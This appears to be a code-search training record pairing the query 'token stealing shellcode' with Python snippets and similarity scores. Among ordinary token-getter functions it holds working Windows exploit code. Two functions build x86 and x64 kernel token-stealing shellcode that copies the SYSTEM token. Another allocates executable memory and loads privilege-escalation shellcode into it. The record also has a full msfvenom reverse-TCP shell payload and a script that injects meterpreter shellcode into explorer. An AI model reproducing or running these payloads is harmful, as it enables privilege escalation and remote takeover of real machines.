https://github.com/Alexpux/mingw-w64/blob/master/mingw-w64-tools/widl/include/winnt.h\n # TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY = 0x00020000 | 0x0008 = 0x20008\n # TOKEN_ALL_ACCESS = 0xf01ff\n\n TOKEN_READ = 0x20008\n res = OpenProcessToken(GetCurrentProcess(), TOKEN_READ, token)\n if not res > 0:\n raise RuntimeError(\"Couldn't get process token\")\n return token", "def token(self) -> str:", "def read_token(self):\n self._skip_white_space()\n return self._get_token()", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += 
b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def token(self):\n return self[\"token\"]", "def token(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"token\")", "def _get_token(self) -> str:\n if IS_SUPERVISOR:\n # On supervisor installs the token is provided by a environment variable\n return os.environ[\"HASSIO_TOKEN\"]\n return self._token", "def token(self):\r\n return self._token", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def getToken(self):\n \n raise NotImplementedError", "def _set_token(self):\n f = open(\".cli_token\")\n data = f.read()\n if data is not None:\n self.token = data\n return self.token", "def get_token(self):\n self.send_cmd(\"support-account status\")\n index = self.cli.expect(['Enabled', 'Disabled'])\n if index == 1:\n self.send_cmd(\"support-account enable\")\n self.send_cmd(\"support-account status\", expected_value='Support account status: Enabled')\n\n # required to fill pexpect buffer with string containing the token\n get_token_line_re = \"token.*\"\n get_token_re = \"token:\\s(.{8})\"\n\n self.expect(get_token_line_re)\n token = re.search(get_token_re, self.cli.after).group(1)\n PrintMessage(\"Token value: {0}\".format(token))\n\n return token", "def token(self):\n print(\"getter of token called\")\n return self._token", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def get_token(self, *args, **kwargs):\n if \"SHIB-ECP\" == self._auth_mode:\n return self._shib_get_token(*args, **kwargs)\n elif \"MAST-AUTH\" == self._auth_mode:\n return self._get_token(*args, **kwargs)\n else:\n raise Exception(\"Unknown MAST Auth mode %s\" % self._auth_mode)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def _handle_token(self, token: str) -> Optional[str]:\n return token" ]
[ "0.70278656", "0.650703", "0.6274305", "0.6186978", "0.6176795", "0.6083142", "0.6050683", "0.59221244", "0.5876762", "0.58669776", "0.5856236", "0.5835206", "0.5827853", "0.58036566", "0.5737415", "0.5736564", "0.5736564", "0.5728309", "0.57101184", "0.56970257", "0.5681948", "0.5680685", "0.5680685", "0.5659311", "0.56415546", "0.56004554", "0.56004554", "0.56004554", "0.55629593", "0.55618346" ]
0.7076698
0
Return a token stealing shellcode related to the platform
def tokenstealingx64(RETVAL, extra = ""):
    (KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()
    shellcode = (
    "\x65\x48\x8b\x04\x25\x88\x01\x00\x00"      # mov rax, [gs:0x188]   ;Get current ETHREAD in
    "\x48\x8b\x40" + KPROCESS +                 # mov rax, [rax+0x68]   ;Get current KPROCESS address
    "\x48\x89\xc1"                              # mov rcx, rax          ;Copy current KPROCESS address to RCX
    "\x48\x8b\x80" + FLINK + "\x00\x00"         # mov rax, [rax+0xe0]   ;Next KPROCESS ActivKPROCESSLinks.Flink
    "\x48\x2d" + FLINK + "\x00\x00"             # sub rax, 0xe0         ;Go to the beginning of the KPROCESS structure
    "\x4c\x8b\x88" + UPID + "\x00\x00"          # mov r9 , [rax+0xd8]   ;Copy PID to R9
    "\x49\x83\xf9\x04"                          # cmp r9 , 0x4          ;Compare R9 to SYSTEM PID (=4)
    "\x75\xe6"                                  # jnz short find_system_process ;If not SYSTEM got to next KPROCESS
    "\x48\x8b\x90" + TOKEN + "\x00\x00"         # mov rdx, [rax+0x160]  ;Copy SYSTEM process token address to RDX
    "\x48\x89\x91" + TOKEN + "\x00\x00"         # mov [rcx+0x160], rdx  ;Steal token with overwriting our current process's token address
    )

    shellcode += extra  # append extra code after token stealing shellcode, e.g.: restore stack

    if RETVAL == "":
        shellcode += "\xc3"                     # retn
    else:
        shellcode += "\xc2" + RETVAL + "\x00"   # ret   0x8

    return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def restoretokenx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x52\"\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\x15\\x00\\x09\\x02\\x00\"\n\t\"\\x89\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x5a\"\n\t)\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. 
Use env variable %s' % TOKEN_NAME)\n return token", "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def token():\n return os.environ.get('TOKEN', None)", "def token(command, hostname):\n communicator = ClickCallback()\n token_command().with_communicator(communicator).build().execute(command=command, hostname=hostname)", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. 
This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def get_process_token():\n # Reference\n # https://gist.github.com/schlamar/7024668\n GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess\n GetCurrentProcess.restype = wintypes.HANDLE\n OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken\n OpenProcessToken.argtypes = (wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE))\n OpenProcessToken.restype = wintypes.BOOL\n token = wintypes.HANDLE()\n\n # https://github.com/Alexpux/mingw-w64/blob/master/mingw-w64-tools/widl/include/winnt.h\n # TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY = 0x00020000 | 0x0008 = 0x20008\n # TOKEN_ALL_ACCESS = 0xf01ff\n\n TOKEN_READ = 0x20008\n res = OpenProcessToken(GetCurrentProcess(), TOKEN_READ, token)\n if not res > 0:\n raise RuntimeError(\"Couldn't get process token\")\n return token", "def token(self) -> str:", "def read_token(self):\n self._skip_white_space()\n return self._get_token()", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += 
b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def token(self):\n return self[\"token\"]", "def token(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"token\")", "def _get_token(self) -> str:\n if IS_SUPERVISOR:\n # On supervisor installs the token is provided by a environment variable\n return os.environ[\"HASSIO_TOKEN\"]\n return self._token", "def token(self):\r\n return self._token", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def getToken(self):\n \n raise NotImplementedError", "def _set_token(self):\n f = open(\".cli_token\")\n data = f.read()\n if data is not None:\n self.token = data\n return self.token", "def get_token(self):\n self.send_cmd(\"support-account status\")\n index = self.cli.expect(['Enabled', 'Disabled'])\n if index == 1:\n self.send_cmd(\"support-account enable\")\n self.send_cmd(\"support-account status\", expected_value='Support account status: Enabled')\n\n # required to fill pexpect buffer with string containing the token\n get_token_line_re = \"token.*\"\n get_token_re = \"token:\\s(.{8})\"\n\n self.expect(get_token_line_re)\n token = re.search(get_token_re, self.cli.after).group(1)\n PrintMessage(\"Token value: {0}\".format(token))\n\n return token", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def token(self):\n print(\"getter of token called\")\n return self._token", "def get_token(self, *args, **kwargs):\n if \"SHIB-ECP\" == self._auth_mode:\n return self._shib_get_token(*args, **kwargs)\n elif \"MAST-AUTH\" == self._auth_mode:\n return self._get_token(*args, **kwargs)\n else:\n raise Exception(\"Unknown MAST Auth mode %s\" % self._auth_mode)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def _handle_token(self, token: str) -> Optional[str]:\n return token" ]
[ "0.7076445", "0.6507405", "0.6274373", "0.61903304", "0.61763257", "0.60805154", "0.60519487", "0.59225285", "0.58747536", "0.58657783", "0.5859614", "0.58332205", "0.5826598", "0.5803254", "0.5735543", "0.5734467", "0.5734467", "0.57258177", "0.5707536", "0.5696128", "0.56801826", "0.56801826", "0.5679771", "0.56567204", "0.5643414", "0.5598562", "0.5598562", "0.5598562", "0.55601126", "0.55597603" ]
0.70282006
1
Determine if the transaction (t) belongs to the trade (tr) without altering tr
def tranBelong(tr, lst, t):
    if tr.isReal():
        cp = Trade()
        cp.state = tr.state
        cp.addTrans(tr.tranCol + lst, False)
    else:
        cp = tr
    return cp.belong(t)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_transaction(self):\n return self._request.has_var(\"_transid\")", "def _check_duplicate_trans(self):\n transactions_set = set(self._transactions)\n return len(transactions_set) == len(self._transactions)", "def is_transaction(self) -> bool:\n return False", "def isTx(self):\n\t\treturn self.extension == '.tx'", "def __eq__(self, other: Any) -> bool:\n if not isinstance(other, Transaction):\n return False\n return self.to_solders() == other.to_solders()", "def transaction_exists(self, transaction: \"Transaction\") -> bool:\n try:\n super().inspect_transaction(transaction=transaction)\n return True\n except grpc.RpcError as err:\n err: grpc.Call\n if err.code() == grpc.StatusCode.NOT_FOUND:\n return False\n raise err", "def IsTriggeredBy(self, settlement):\n if not _is_valid_sbl_settlement(settlement):\n return False\n \n partial_return_identifier = settlement.Trade().Text1()\n if settlement.Status() != 'Settled':\n return False\n if partial_return_identifier not in ['', None]:\n return False\n loan_trade = settlement.Trade().ContractTrdnbr()\n if not _is_settled_loan_settlements(loan_trade):\n return False\n\n return True", "def __ne__(self, other):\n if not isinstance(other, Transaction):\n return True\n\n return self.to_dict() != other.to_dict()", "def remove_trade(self, trade):\n if not trade:\n return False\n\n self.lock()\n self.trades.remove(trade)\n self.unlock()", "def is_buy(order):\n return(copysign(1, order.amount)>=0)", "def IsTriggeredBy(self, settlement):\n if not _is_valid_sbl_settlement(settlement):\n return False\n \n partial_return_identifier = settlement.Trade().Text1()\n if settlement.Status() != 'Authorised':\n return False\n if partial_return_identifier != 'PARTIAL_RETURN':\n return False\n loan_trade = settlement.Trade().ContractTrdnbr()\n if _is_settled_loan_settlements(loan_trade):\n return False\n\n return True", "def verify_transaction(transaction):\n sender_balance = get_balance(transaction['sender'])\n return sender_balance >= transaction['amount']", "def trigger(self, trade) -> bool:\n pass", "def is_affordable_transaction(self, tx_message: TransactionMessage) -> bool:\n if tx_message.amount == 0 and all(\n quantity == 0 for quantity in tx_message.tx_quantities_by_good_id.values()\n ):\n # reject the transaction when there is no wealth exchange\n result = False\n elif tx_message.amount <= 0 and all(\n quantity >= 0 for quantity in tx_message.tx_quantities_by_good_id.values()\n ):\n # check if the agent has the money to cover the sender_amount (the agent=sender is the buyer)\n result = (\n self.amount_by_currency_id[tx_message.currency_id]\n >= tx_message.sender_amount\n )\n elif tx_message.amount >= 0 and all(\n quantity <= 0 for quantity in tx_message.tx_quantities_by_good_id.values()\n ):\n # check if the agent has the goods (the agent=sender is the seller).\n result = all(\n self.quantities_by_good_id[good_id] >= -quantity\n for good_id, quantity in tx_message.tx_quantities_by_good_id.items()\n )\n else:\n result = False\n return result", "def _is_valid_trade(self, trade):\n if not trade:\n return False\n\n if trade.Status() in VALID_TRADE_STATUSES:\n if acm.Time().AsDate(trade.TradeTime()) > self.start_date:\n return False\n print '1'\n ins_type = trade.Instrument().InsType()\n if ins_type == 'Curr':\n if trade.ValueDay() > self.start_date:\n return True\n elif ins_type == 'Combination':\n for comb_ins in trade.Instrument().Instruments():\n trades = comb_ins.Trades()\n if trades and trades[0] in VALID_TRADE_STATUSES:\n trade = trades[0]\n ins_type 
= trade.Instrument().InsType()\n if (self._is_basis_trade(trade) and\n ins_type in ('Swap', 'FRA')):\n return True\n elif ins_type == 'CurrSwap':\n if trade.Instrument().ExpiryDateOnly() > self.start_date:\n return True\n else:\n if trade.Instrument().ExpiryDateOnly() > self.start_date:\n if (self._is_basis_trade(trade) and\n ins_type in ('Swap', 'FRA')):\n return True\n\n return False", "def check_transaction(self):\n if self.transaction_valid():\n transid = self._request.var(\"_transid\")\n if transid and transid != \"-1\":\n self._invalidate(transid)\n return True\n else:\n return False", "def is_market(self):\n return(not self.is_pending)", "def __eq__(self, other):\n if not isinstance(other, Transaction):\n return False\n\n return self.to_dict() == other.to_dict()", "def in_transaction(self):\n # We likely just changed data - give it a second to catch up\n time.sleep(0.1) # I think I keep reading journal watermark too soon without this\n \n # Get relevant data\n water_mark = pos.read_journal_watermark()\n self.log.info(f\"Watermark: [{water_mark}]\")\n balance = pos.read_balance()['Total']\n self.log.info(f\"Balance: [{balance}]\")\n \n # Decide if we need more checks based on watermark\n if water_mark == \"TRANSACTION IN PROGRESS\":\n self.log.info(\"In Transaction: In Transaction Watermark found\")\n return True\n elif water_mark == \"TRANSACTION COMPLETE\" or water_mark == \"TRANSACTION VOIDED\":\n self.log.info(\"Not in Transaction: Transaction Complete/Voided watermarks found\")\n return False\n else:\n # No watermark - decide based on balance\n if balance == \"$0.00\":\n self.log.info(\"Not in Transaction: $0 balance with no watermark\")\n return False\n else:\n self.log.info(\"In Transaction: Non-$0 balance with no watermark\")\n return True", "def is_tx(self):\n return self._pin_name in TX_CHANNELS", "def Trading(Seller,Buyer):\n if Seller.has_sold == False:\n if Buyer.like_buy >= Seller.like_sell:\n Seller.has_sold = True\n Buyer.has_bought = True\n Seller.sold_objects += 1\n Buyer.bought_objects += 1\n print('A trade has been made')\n else:\n Buyer.has_bought = False\n Seller.has_sold = False\n print('There was no deal')\n else:\n Buyer.has_bought = False", "def get_physical_trade(t_exer):\n if not t_exer.insaddr.und_insaddr:\n return None\n ins = ael.Instrument.read('insaddr={0}'.format(t_exer.insaddr.insaddr))\n is_strike_quotation_different = 0\n if (ins.und_insaddr.quotation_seqnbr and ins.strike_quotation_seqnbr and\n ins.strike_quotation_seqnbr != ins.und_insaddr.quotation_seqnbr):\n is_strike_quotation_different = 1\n\n und = ael.Instrument.read('insaddr={0}'.format(\n t_exer.insaddr.und_insaddr.insaddr))\n pr_trades = ael.Trade.select('contract_trdnbr={0}'.format(\n t_exer.contract_trdnbr))\n for t in pr_trades:\n if t.insaddr.insaddr == und.insaddr:\n return t\n elif (is_strike_quotation_different and t.curr.insaddr == und.insaddr):\n return t", "def _apply_trx_trade_to_allocation(cls, allocation, block_trade):\n try:\n allocation.TrxTrade(block_trade)\n allocation.Commit()\n except Exception as e:\n error_message = 'Failed to stamp TrxTrade {0} on Allocation Trade: {1} , {2}'\n LOGGER.exception(error_message.format(block_trade.Oid(), allocation.Oid(), e))\n return False\n\n return True", "def IsTriggeredBy(self, settlement):\n if not _is_valid_sbl_fee_settlement(settlement):\n return False\n\n return True", "def __eq__(self, other):\n if not isinstance(other, MarketOrderRejectTransaction):\n return False\n\n return self.__dict__ == other.__dict__", "def 
